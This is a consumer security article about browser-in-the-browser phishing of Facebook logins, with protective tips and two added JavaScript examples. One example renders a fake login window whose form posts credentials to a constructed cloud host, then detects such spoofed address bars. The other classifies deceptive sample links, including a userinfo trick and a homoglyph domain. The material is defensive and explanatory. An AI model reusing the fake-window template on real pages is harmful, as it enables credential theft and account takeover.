Browser-in-the-Browser: The New Facebook Phishing Attack That Targets Users’ Login Information
Facebook users, watch out for yet another scam technique: browser-in-the-browser phishing, in which a legitimate-looking fake pop-up window drawn inside the real browser asks for login credentials and personal information.

Cybersecurity firm Trellix recently cautioned about a new “browser in the browser” (BitB) phishing technique on Facebook, where hackers aim to steal users’ login credentials to take over the account, steal their personal information, spread scams or commit identity fraud.
Here’s how it works: Scammers send a legitimate-looking phishing email purporting to come from Facebook or from a law firm, under the pretext of alerting the user to an account suspension or policy violation, an unauthorized login attempt, a security update, or even a legal notice.
That email usually includes a shortened hyperlink disguised as a Facebook login link. Clicking it leads to the page hosting the phishing kit. The BitB technique then draws a custom-built fake browser window, made of ordinary HTML and CSS, inside the user’s real browser window, so that it looks like a genuine Facebook login pop-up.
Trellix’s investigation found examples that even show a fake Meta captcha before the “Facebook” login pop-up appears. The pop-up’s address bar displays the Facebook URL, but according to Trellix that URL is hardcoded text in the page, not the browser’s own address bar, so the familiar address says nothing about where the typed credentials are actually sent.
The BitB pop-up first asks for basic information, such as full name, email address, phone number and date of birth, then asks the user to enter their password to continue. Entering this information gives the scammers everything they need to take over the account.
These phishing pages can also evade security filters because they are hosted on legitimate cloud platforms, including Netlify and Vercel, according to Trellix.
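To make the mechanism concrete, here is an added illustration in plain JavaScript (it runs under Node.js, no browser needed); it is not code from Trellix’s report or from the phishing kit. It builds the kind of fake window a BitB page renders, with the address bar as hardcoded text, and then runs a simple defender-side check over the captured HTML: any URL shown as visible text that points at a different site from the one the page was served from is flagged. The hostnames, the CSS class names and the “same site” shortcut are assumptions made for the example.

```javascript
// Added illustration, not code from Trellix or the article. Runs under Node.js.
// The URLs, hostnames and class names below are constructed for the example.

// What the phishing page renders: a styled <div> dressed up as a browser
// window. Nothing here is real browser chrome, so the address text can say
// anything, including https://www.facebook.com/, wherever the page is hosted.
function buildFakeWindowHtml(displayUrl, formAction) {
  return [
    '<div class="bitb-window">',
    '  <div class="bitb-titlebar">',
    `    <span class="bitb-address">${displayUrl}</span>`, // hardcoded text, not the browser's address bar
    '  </div>',
    `  <form method="POST" action="${formAction}">`, // the real destination of the credentials
    '    <input name="email" placeholder="Email or phone">',
    '    <input name="pass" type="password" placeholder="Password">',
    '    <button type="submit">Log in</button>',
    '  </form>',
    '</div>',
  ].join('\n');
}

// Rough "same site" test: compare the last two DNS labels. A public-suffix
// list would be more accurate; this simplification is enough for the demo.
function sameSite(hostA, hostB) {
  const tail = (h) => h.toLowerCase().split('.').slice(-2).join('.');
  return tail(hostA) === tail(hostB);
}

// Defender-side heuristic over a captured page: a URL that appears as
// visible text (not inside an href/src attribute) and points at a different
// site from the one the page was actually served from. Real sites seldom
// print a foreign URL in a box that looks like an address bar; BitB pages do.
function findSpoofedAddressBars(html, servedFromHost) {
  const visibleText = html
    .replace(/<script[\s\S]*?<\/script>/gi, ' ')
    .replace(/<[^>]+>/g, ' '); // drop tags and attributes, keep text nodes
  const hits = [];
  for (const candidate of visibleText.match(/https?:\/\/[^\s"'<>]+/g) || []) {
    let shownHost;
    try {
      shownHost = new URL(candidate).hostname;
    } catch {
      continue; // not a parseable URL, ignore
    }
    if (!sameSite(shownHost, servedFromHost)) {
      hits.push({ shownUrl: candidate, shownHost });
    }
  }
  return hits;
}

// Demo: the kit is hosted on a cloud platform but displays facebook.com.
const phishHtml = buildFakeWindowHtml(
  'https://www.facebook.com/login.php',              // what the victim sees
  'https://account-review-demo.netlify.app/collect'  // where the form posts (constructed hostname)
);
const findings = findSpoofedAddressBars(phishHtml, 'account-review-demo.netlify.app');
console.log(findings); // one hit: shownHost 'www.facebook.com' on a netlify.app page
```

The check is deliberately crude (it will also flag a blog post that quotes a Facebook URL in running text), but it captures the defining property of a BitB page: the only place “facebook.com” appears is as text the attacker typed, never as the origin the browser connected to.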
What Facebook Users Can Do to Protect Themselves
If you’re worried that you or a loved one will fall for the BitB scam, here are a few things you can do to mitigate the risk.
- Turn on two-factor authentication (2FA) on your Facebook account, so that a stolen password alone is not enough to take the account over. Note that a phishing page can also ask for the one-time code and relay it, so an authenticator app or a security key is a stronger choice than SMS codes.
- Use a password manager for your login information. It generates and remembers strong, unique passwords, which makes changing a compromised password painless, and it autofills credentials only on the site they were saved for, matching on the page’s real address rather than on what the page looks like. A BitB window is part of the phishing page, whose real address is not facebook.com, so the manager will not offer to fill it in; if autofill stays silent on a “Facebook” login, be suspicious.
- Never click an email link and instead navigate directly to Facebook to check for notifications and account status.
- Be suspicious of shortened URLs and of links that do not use the official facebook.com domain.
- Treat pop-up login windows with suspicion. A real pop-up is a separate browser window: you can drag it outside the main window, and its address bar is browser chrome you can click into. A BitB window is just part of the page, so it cannot leave the page area, and its “address bar” is drawn text that shows whatever the attacker typed. When in doubt, close the pop-up and log in from a fresh tab at facebook.com.
- Understand that Facebook is among the riskiest social platforms for scams, accounting for 78% of online social media scams, followed by YouTube (17.6%) and Instagram (2.2%), with ad/shopping scams the most common category, followed by phishing.
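The password-manager and link-checking advice above comes down to one rule: judge a link by the hostname the browser will actually connect to, not by the text around it. As an added example (not from the article or from Trellix), the JavaScript below, runnable under Node.js, triages links the way a password manager’s origin matching does, and catches the common tricks: a brand name stuffed into a subdomain of an unrelated host, a shortener that hides the destination, a fake host placed before an `@`, and a homoglyph domain that the browser turns into an `xn--` label. The `OFFICIAL_DOMAINS` and `KNOWN_SHORTENERS` lists and the sample links are assumptions constructed for the demo.

```javascript
// Added example, not from the article or Trellix. Runs under Node.js.
// OFFICIAL_DOMAINS and KNOWN_SHORTENERS are assumptions chosen for the demo,
// not authoritative lists; the sample links at the bottom are constructed.

const OFFICIAL_DOMAINS = ['facebook.com'];
const KNOWN_SHORTENERS = ['bit.ly', 't.co', 'tinyurl.com', 'goo.gl', 'ow.ly'];

// Registrable domain approximated as the last two labels (no public-suffix list).
function registrableDomain(hostname) {
  return hostname.toLowerCase().replace(/\.$/, '').split('.').slice(-2).join('.');
}

function classifyLink(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return { verdict: 'invalid', host: null, reason: 'not a parseable URL' };
  }
  const host = url.hostname; // WHATWG parsing already lower-cases and punycodes this
  if (url.protocol !== 'https:' && url.protocol !== 'http:') {
    return { verdict: 'suspicious', host, reason: `non-web scheme ${url.protocol}` };
  }
  // "https://www.facebook.com@evil.example/": everything before the @ is
  // userinfo; the browser connects to evil.example.
  if (url.username || url.password) {
    return { verdict: 'suspicious', host, reason: 'userinfo before the real host' };
  }
  const base = registrableDomain(host);
  if (OFFICIAL_DOMAINS.includes(base)) {
    return { verdict: 'official', host, reason: 'registrable domain is official' };
  }
  if (KNOWN_SHORTENERS.includes(base)) {
    return { verdict: 'shortener', host, reason: 'destination hidden behind a shortener' };
  }
  // Internationalised labels (xn--) can hide homoglyphs such as Cyrillic "а".
  if (host.split('.').some((label) => label.startsWith('xn--'))) {
    return { verdict: 'lookalike', host, reason: 'internationalised hostname' };
  }
  // Brand name in a subdomain or path of an unrelated site,
  // e.g. facebook.com.account-review.netlify.app
  if (/facebook|meta/i.test(host) || /facebook|meta/i.test(url.pathname)) {
    return { verdict: 'lookalike', host, reason: 'brand name outside the official domain' };
  }
  return { verdict: 'other', host, reason: 'unrelated site' };
}

// Constructed sample links, roughly the kinds seen in such emails.
const SAMPLES = [
  'https://www.facebook.com/login/',
  'https://facebook.com.account-review.netlify.app/login',
  'https://bit.ly/3xxxxxx',
  'https://www.facebook.com@evil.example/login',
  'https://f\u0430cebook.com/', // Cyrillic "а" in place of Latin "a"
];
for (const link of SAMPLES) {
  const { verdict, host, reason } = classifyLink(link);
  console.log(`${verdict.padEnd(10)} ${host || '-'}  ${reason}`);
}
```

Only the first sample comes back as `official`; a password manager applies the same kind of origin test before it offers to autofill, which is why it stays quiet on a BitB page no matter how convincing the drawn address bar looks.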
It’s also questionable how much Facebook is working to address scams, especially when Reuters reported that Meta projected that 10% of its 2024 revenue would come from ads for scams/banned goods, and that Meta estimates its platform shows its 3 billion users 15 billion scam ads a day.

